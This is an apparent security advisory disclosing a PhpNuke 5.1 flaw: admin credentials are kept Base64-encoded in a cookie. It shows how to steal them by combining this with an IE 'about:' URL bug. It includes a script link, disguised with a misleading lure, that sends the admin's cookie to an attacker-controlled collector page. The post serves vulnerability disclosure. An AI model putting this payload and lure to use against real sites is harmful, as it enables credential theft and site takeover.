PhpNuke Admin password can be stolen !
by Cabezon Aurélien | aurelien.cabezon@iSecureLabs.com
http://www.isecurelabs.com/article.php?sid=229 [FR VERSION] + screen shot

Vulnerable : PhpNuke 5.1
Other version : not tested
PostNuke : not tested

[1] Introduction

I have found a way to stole PhpNuke Admin password.
I use 2 vulnerability.

[2] Description

The first vulnerability is that ADMIN login/passwd are stored in a cookie
like this :

---snip---
lang
english
isecurelabs.com/
0
725504896
29523774
551579360
29450340
*
admin
QWRtaW46TmljZV9Ucnk6DQo=
isecurelabs.com/
0
1451582336
29456384
3432929360
29450340
*
---snip---

and i discovered that the Admin password was BASE64 encoded !
So it is very easy to decode it !

Fore exemple :
QWRtaW46TmljZV9Ucnk6DQo=  is Admin:Nice_Try:

You can verify here : http://www.isecurelabs.com/base64.php

The second vulnerability i use is the "Microsoft IE Cookies Exposure via
'About:' URLS"
exposed here : http://www.securiteam.com/windowsntfocus/6I00D1535I.html

Here is the plan :

First create a php script that can gather getenv("QUERY_STRING") in a file.

Then create this kind of link and force the phpnuke administrator to follow
it :

[a
href="about://www.nuked-site.com/[script]window.open("http://www.yourwebsite
.com/cook.php?"+document.cookie);[/script]"]Hey,this is the last Bind9
remote root exploit ![/a]

(replace [ & ] by < & >)
www.nuked-site.com is the site that you want to get cookie.
www.yourwebsute.com is the site that will recieve the cookie thru the
cook.php script.

If the nuked site's admin follow this link, he will send to your script his
cookie with the Base64 encoded password.
Then you just have to decode it !

That's all !

regards,


---
Cabezon Aurélien | aurelien.cabezon@isecurelabs.com
http://www.iSecureLabs.com | French Security Portal